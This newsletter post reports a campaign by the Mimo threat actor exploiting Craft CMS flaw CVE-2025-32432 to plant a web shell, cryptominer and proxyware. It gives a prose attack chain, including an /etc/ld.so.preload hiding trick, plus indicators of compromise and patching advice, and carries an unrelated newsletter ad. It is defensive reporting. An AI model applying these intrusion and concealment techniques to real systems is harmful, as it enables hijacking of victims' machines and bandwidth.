• Cyber Syrup
  • Posts
  • Mimo Threat Actor Exploits Craft CMS Vulnerability to Deploy Miners and Proxyware

Mimo Threat Actor Exploits Craft CMS Vulnerability to Deploy Miners and Proxyware

Cybersecurity researchers have identified a new campaign launched by the financially motivated threat actor Mimo, which exploits a critical vulnerability in Craft Content Management System (CMS) to deploy multiple malicious payloads

May 29, 2025

In partnership with

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.

Find out why 1M+ professionals read Superhuman AI daily.

In 2 years you will be working for AI

Or an AI will be working for you

Here's how you can future-proof yourself:

  1. Join the Superhuman AI newsletter – read by 1M+ people at top companies

  2. Master AI tools, tutorials, and news in just 3 minutes a day

  3. Become 10X more productive using AI

Join 1,000,000+ pros at companies like Google, Meta, and Amazon that are using AI to get ahead.

Mimo Threat Actor Exploits Craft CMS Vulnerability to Deploy Miners and Proxyware

Cybersecurity researchers have identified a new campaign launched by the financially motivated threat actor Mimo, which exploits a critical vulnerability in Craft Content Management System (CMS) to deploy multiple malicious payloads. The goal: to hijack system resources for cryptocurrency mining and residential proxyware monetization, commonly referred to as cryptojacking and proxyjacking.

The flaw in question—CVE-2025-32432—is a maximum severity remote code execution (RCE) vulnerability discovered in early 2025 and patched in Craft CMS versions 3.9.15, 4.14.15, and 5.6.17. The vulnerability was first disclosed by Orange Cyberdefense SensePost after observing active exploitation as early as February 2025.

Attack Chain and Payloads

Step 1: Exploiting the Craft CMS Vulnerability

The attackers exploit CVE-2025-32432 to gain unauthorized access to Craft CMS instances. Once inside, they deploy a web shell to maintain persistent access. This shell allows them to download and execute a malicious script named 4l4md4r.sh.

Step 2: Shell Script Execution

The script is fetched from a remote server using tools such as curl, wget, or the Python urllib2 library.

Interestingly, the attacker renames the Python library as fbi—a unique and likely intentional reference to the U.S. Federal Bureau of Investigation. This quirky alias can serve as a behavioral indicator for analysts during threat hunting or forensic analysis.

“This naming convention could serve as a useful indicator for detection, especially in retroactive analysis of suspicious Python activity,” said Sekoia researchers Jeremy Scion and Pierre Le Bourhis.

Step 3: System Hygiene and Competition Removal

Before deploying additional malware, the script:

  • Checks for prior infections

  • Uninstalls known cryptocurrency miners

  • Terminates active instances of XMRig or similar mining tools

This behavior ensures that Mimo’s payloads have exclusive access to system resources.

Step 4: Deploying the Mimo Loader and Payloads

The script then launches an ELF binary named 4l4md4r, which functions as the Mimo Loader. Its primary actions include:

  • Modifying /etc/ld.so.preload to execute a malicious shared object (alamdar.so) at runtime

  • Hiding its presence from security tools and administrators

  • Deploying the XMRig miner to generate cryptocurrency

  • Installing IPRoyal proxyware, which sells the victim’s internet bandwidth for profit

Together, these tools enable multifaceted monetization of compromised systems, turning each infected host into a source of both computational power and network bandwidth.

Attribution to Mimo Intrusion Set

The campaign has been attributed to Mimo, a financially motivated threat group that has been active since at least March 2022. In previous campaigns, Mimo exploited several high-profile vulnerabilities, including:

  • CVE-2021-44228 – Apache Log4j

  • CVE-2022-26134 – Atlassian Confluence

  • CVE-2023-27350 – PaperCut

  • CVE-2023-46604 – Apache ActiveMQ

Mimo’s operations were also linked to ransomware activity in 2023, involving a Go-based ransomware variant called Mimus, derived from the open-source project MauriCrypt, according to AhnLab.

Threat Actor Origins and Infrastructure

Sekoia identified that exploitation attempts originated from a Turkish IP address (85.106.113[.]168). Open-source intelligence (OSINT) suggests that the attacker is likely operating from within Turkey, although definitive attribution remains tentative.

“Mimo remains active and operational, continuing to exploit newly disclosed vulnerabilities,” Sekoia stated. “The short timeframe between the public disclosure of CVE-2025-32432 and its exploitation reflects a high level of responsiveness and technical agility.”

Key Takeaways and Mitigation

Why It Matters:

This campaign demonstrates the real-world risk of delayed patching, especially for publicly accessible applications like CMS platforms.

Recommended Actions:

  • Update Craft CMS to patched versions (3.9.15+, 4.14.15+, or 5.6.17+)

  • Monitor for unusual system modifications (e.g., changes to /etc/ld.so.preload)

  • Scan for known indicators like:

    • Suspicious shell script names (4l4md4r.sh)

    • Unusual Python aliases like import urllib2 as fbi

  • Use endpoint monitoring to detect mining or proxyware installations

  • Audit for unauthorized downloads or outbound network traffic

Conclusion

The Mimo intrusion set’s rapid weaponization of newly disclosed vulnerabilities illustrates the evolving landscape of financially motivated cyber threats. By combining cryptojacking, proxyjacking, and stealthy persistence techniques, attackers like Mimo are maximizing profits while minimizing visibility—underscoring the critical need for timely patching, threat intelligence sharing, and behavioral monitoring across enterprise environments.